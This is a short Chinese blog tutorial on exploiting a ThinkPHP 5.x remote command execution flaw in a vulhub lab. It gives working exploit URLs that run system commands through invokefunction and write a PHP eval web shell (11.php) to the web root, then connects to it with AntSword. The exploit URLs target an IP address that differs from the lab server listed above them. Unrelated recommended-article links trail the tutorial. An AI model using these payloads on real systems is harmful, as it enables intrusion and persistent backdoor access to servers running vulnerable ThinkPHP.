Thinkphp(TP)框架漏洞攻略

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
fundroid5 分钟前
Kotlin 协程:Channel 与 Flow 深度对比及 Channel 使用指南
android·kotlin·协程
草字14 分钟前
cocos 打包安卓
android
夏天想21 分钟前
优化 WebSocket 实现单例连接用于打印【待测试 】
网络·websocket·网络协议
BD_Marathon1 小时前
Ubuntu:Mysql服务器
服务器·mysql·ubuntu
DeBuggggggg1 小时前
centos 7.6安装mysql8
android
我是小bā吖1 小时前
阿里云服务网格ASM实践
网络·阿里云·云计算·服务发现
吴free2 小时前
mac电脑wireshark快速实现http接口抓包
网络·测试工具·http·wireshark
浩浩测试一下2 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
0wioiw02 小时前
Ubuntu基础(监控重启和查找程序)
linux·服务器·ubuntu
艾希逐月2 小时前
TCP数据的发送和接收
服务器·网络·tcp/ip